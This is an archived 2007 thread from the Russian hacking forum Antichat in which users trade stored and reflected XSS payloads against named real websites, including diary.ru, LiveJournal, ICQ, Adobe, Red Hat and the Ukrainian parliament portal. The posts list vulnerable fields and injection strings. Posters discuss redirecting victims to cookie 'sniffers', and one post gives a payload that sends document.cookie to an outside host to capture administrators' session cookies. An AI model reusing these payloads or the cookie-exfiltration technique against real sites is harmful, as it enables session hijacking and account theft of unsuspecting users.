ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

XenOtai 03.09.2007 15:15

Цитата:

http://diary.ru/options/diary/?mydiary
Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс.

Пример запроса в поле:

Цитата:

"><script>alert(document.cookie)</script>

l-l00K 04.09.2007 18:28

Код:

http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F
Оставляем комментарий такого вида:
Код:

"><script>alert('xss')</script>

XenOtai 04.09.2007 22:27

Цитата:

livejournal.com
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

Пример запроса:

Цитата:

<script>alert(document.cookie)</script>

Пример можно посмотреть здесь:

Цитата:

http://test-govno.livejournal.com/profile
PS. Не должны быть указаны страна и часовой пояс.

AdReNa1!Ne 14.09.2007 21:07

http://robotraff.com/userpanel/selltraff.php
Уязвимы все поля

Результат - http://robotraff.com/userpanel/stats.php?thread=136

lsass.exe 14.09.2007 21:34

http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0& cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29% 3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Csc ript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cat=0&x =0&y=0

http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

+StArT+ 22.09.2007 14:31

Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
.................................................. .......................
Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:"
при добавлении новости пользователем, и в личных сообщениях.
В поле "текст:" пишем следующие:
Код:

<img src="a"onError=javascript:alert('XSS');>
Также, еще была найдена пассивная XSS
Код:

<a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a>
.................................................. .......................
______________________________________________
*****************************************

F1anKeR 25.09.2007 13:37

Цитата:

Сообщение от XenOtai
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить

Scipio 25.09.2007 13:47

Цитата:

Сообщение от F1anKeR
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить

Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте

freddi 26.09.2007 12:40

icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно

SSSetuPPP 21.10.2007 04:35

Цитата:

Сообщение от freddi
icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно

Где находится это поле "Image web address:"?

SSSetuPPP 21.10.2007 04:37

Цитата:

Сообщение от freddi
mail.ru yandex.ru rambler.ru

отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает.
минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера)

на мейле прикрыли. куки норм приходят только на рамблер.

И на рамблере тоже не работает...:(

freddi 21.10.2007 14:20

Цитата:

Сообщение от SSSetuPPP
И на рамблере тоже не работает...:(

работает, в ие по крайней мере точно.

Цитата:

Сообщение от SSSetuPPP
Где находится это поле "Image web address:"?

http://img30.picoodle.com/img/img30/...3m_424a366.jpg

SSSetuPPP 23.10.2007 15:58

Цитата:

Сообщение от freddi
работает, в ие по крайней мере точно.

Слушай у меня не работает, может я чё не так делаю? Не мог бы ты пободробней объяснить?

BlackCats 25.10.2007 23:13

cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:
Цитата:

http://www.cyberfight.ru/site/profile/108747
при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.

ЛифчиС5СВ 26.10.2007 22:30

Цитата:

Сообщение от BlackCats
cyberfight.ru популярный ресурс - 7000-8000 хостов в день.
пример:

при регистрации в кач-ве логина указываеш скрипт, потом пр просмотре твоего профля - он выполница.

Добавлю, что там еще пассивная ХСС c куками. Уж0с

Код:

http://www.cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Search.x=0&Search.y=0

BlackCats 26.10.2007 23:12

пассивные я тоже находил, но эта тема называется активные xss ;)

BlackCats 27.10.2007 17:12

http://livechat.boldchat.com/aid/6278237534205176796/bc.chat
active XSS в поле your name

Fugitif 27.10.2007 17:18

Paradox Security Systems

Код:

http://paradox-security.ru/index.php?action=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E


edit:



Blogus.ru

Код:

http://www.blogus.ru/tagposts.aspx?id=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E


edit:


Moto.ru


Код:

http://www.moto.ru/ubbthreads/showprofile.php?Cat=%22%3E%3Cscript%3Ealert(%22XSS%20BY%20Fugitif%22)%3C/script%3E

Dreel 29.10.2007 05:27

Fugitif, и где там активность????
_http://job.properm.ru/
_http://auto.properm.ru/
Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
Код:

Иванов Иван <script>alert(/ xss /)</script>
Заходим на сайт _http://www.virtualflowers.ru/abook.php
Добавить адресата - в каментах
Код:

<script>alert(/ GraBBerZ.com /)</script>

freddi 29.10.2007 14:50

mail.ru

в блогах пишем сообщение, там можно использовать разные теги, например имейдж

<img src="адрес_снифера">

так все прекрасно работает, но куки не отошлешь тк стоит фильтрация "+", я как ни старался не обошел ее.


зы пользуясь случаем хочу передать привет админам мейла.

Серенький 31.10.2007 02:05

xss
 
netprint.ru

Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>

Укладываемся в 40 символов.

phol1eadeux 03.11.2007 03:31

ЛЕНТА - сеть гипермаркетов
Код:

http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>

ZAMUT 03.11.2007 17:54

Цитата:

Сообщение от phol1eadeux
ЛЕНТА - сеть гипермаркетов
Код:

http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>

Ошибся разделом, это пассивная

phol1eadeux 03.11.2007 18:00

Разобрался

~!DoK_tOR!~ 04.11.2007 02:45

http://nsti.ru/guest/

Гостевая книга

Добавляем во все формы: "onmouseover="alert('xss')"

ZAMUT 04.11.2007 21:46

Код:

www.miem.edu.ru
Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.
Код:

http://www.econ.msu.ru/
Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя
Код:

http://www.rapway.com.ru/
Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт
Код:

www.saletime.biz
Гостевая книга. Уязвимо поле: Имя
Код:

http://livemy.info
Регистрируемся, идем в раздел "События", уязвимое поле - описание события.
Код:

http://blog.inf.by
Регистрируемся, уязвимое поле: Название блога

Че-то пост разросся =)

ZAMUT 07.11.2007 01:57

Верховная Рада Украины =)
Код:

http://portal.rada.gov.ua
Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)

Scipio 07.11.2007 02:58

Adobe.com

регимся здесь

Код:

https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus
при регистрации вставляем в любое поле
<script>alert(12121)</script>

кроме e-mail, password, zip-code...

заходим в свой аккаунт и видим активную XSS...
Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф :)

ZAMUT 07.11.2007 20:22

http://www.pcgames.lt
Уязвимые поля при регистрации:Nick,Vardas,Pavardė

ZAMUT 08.11.2007 22:53

www.omen.ru
Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
P.S. Сорри за 2ой пост =)

phol1eadeux 20.11.2007 19:36

это в пассивные xss

it's my 27.11.2007 10:17

www.fanat.com.ua
Украинские фанаты футбола

Код:

http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22

ZAMUT 27.11.2007 10:40

Цитата:

Сообщение от it's my
www.fanat.com.ua
Украинские фанаты футбола

Код:

http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22

1. Это пассивная.
2. Сообщение в алерте нуждается в одинарных кавычках.

inlanger 27.11.2007 20:50

это тоже пассивная. люди, читайте статьи и разбирайтесь что в какую тему писать

BlackCats 02.12.2007 16:19

http://www.rabotnitsa.ru/guestbook.php
сайт журнала работница уязвимые поля емейл, автор

otmorozok428 04.12.2007 15:52

Форум сертифицированных специалистов :)

http://www.certification.ru

В добавляемое сообщение вставляем:

Цитата:

<img src=javascript:q=new/**/Image;/**/q.src='http://www.mysite.ru/script.php'+'?c='+document.cookie>
И ждём, когда к нам в гости прилетят админские кукизы.

Fugitif 04.12.2007 23:26

REDHAT

Код:

https://www.redhat.com/wapps/sso/rhn/login.html?redirect=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E

SWISS CARD

Код:

http://www.swisscard.ch/d/stellen/stellen_detail.php?oid=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E

AND

PAYPAL SUCKS

Код:

http://www.paypalsucks.com/forums/showthread.php?fid=17&tid=6209&old_block=0&block=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

:p



EDIT:


here is wrong place...sorry ppl

NilsonUA 06.12.2007 00:17

libra.kiev.ua/list_lyr.php?show_id=6578&page=1


в поле эмайл вводим '"><script>alert('Хss')</script>

BlackCats 06.12.2007 11:10

http://playboy.com.ru/stat/se.php
активная ксс на официальном российском сайте суперпопулярного плейбоя
описание тут:
https://forum.antichat.ru/thread55136.html

Mike 007 06.12.2007 21:26

http://www.babki.net/search.php
в поисковике товаров введите <script>alert('Mike 007 rulezz :D')</script>


Время: 00:42